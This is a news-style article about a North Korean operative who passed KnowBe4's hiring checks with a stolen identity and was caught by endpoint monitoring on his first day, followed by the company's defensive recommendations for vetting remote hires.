North Korean State Hacker Attempted to Infiltrate KnowBe4

KnowBe4 recently thwarted a sophisticated attempt by a North Korean national posing as a software engineer to infiltrate their IT systems. Despite undergoing extensive vetting processes, the attacker was detected before any data breach occurred, highlighting the evolving threat landscape faced by organizations.

In an effort to expand its internal IT AI team, KnowBe4 posted a job listing and went through its standard hiring procedures, including multiple video interviews and thorough background checks. The individual, presenting as a legitimate candidate using a stolen US-based identity, successfully passed these checks.

The scam unraveled when the company's Endpoint Detection and Response (EDR) software identified suspicious activities as soon as the new hire's workstation was activated on July 15, 2024. The position in question was for a Principal Software Engineer. The suspicious activities, detected by the SOC at 9:55 PM EST, involved manipulation of session history files, unauthorized file transfers, and malware execution via a Raspberry Pi.

The KnowBe4 Security Operations Center (SOC) immediately contacted the new hire, who claimed to be troubleshooting a router issue. However, when asked for further details, the individual became unresponsive, raising further suspicion. The device was contained by SOC at 10:20 PM EST. KnowBe4 collaborated with cybersecurity experts Mandiant and the FBI, revealing the hire to be a North Korean operative using an AI-enhanced photo for identification.

The attacker had the workstation shipped to an address part of a network of “IT mule laptop farms.” Operating from North Korea or nearby regions in China, the individual worked night shifts to align with US daytime hours, effectively masking their true location.

KnowBe4's response and recommendations

KnowBe4 responded to this incident by enhancing monitoring for anomalies, strengthening background checks and reference verification, and improving access controls and authentication processes. Additionally, security awareness training focusing on social engineering was emphasized.

To prevent similar incidents, it is crucial to scan remote devices to ensure they are not accessed remotely by unauthorized individuals. The vetting processes must be robust, verifying candidates' physical locations and cross-checking career histories for inconsistencies. Video interviews should be conducted with candidates discussing specific job-related tasks, and any discrepancies in shipping addresses and residences should be investigated.

The attacker demonstrated a high level of sophistication by using VOIP numbers and maintaining a minimal digital footprint. There were discrepancies in the address and date of birth provided, conflicting personal information, and suspicious excuses. The attacker also employed sophisticated VPN or VM usage for system access, attempted to execute malware, and engaged in subsequent cover-up efforts.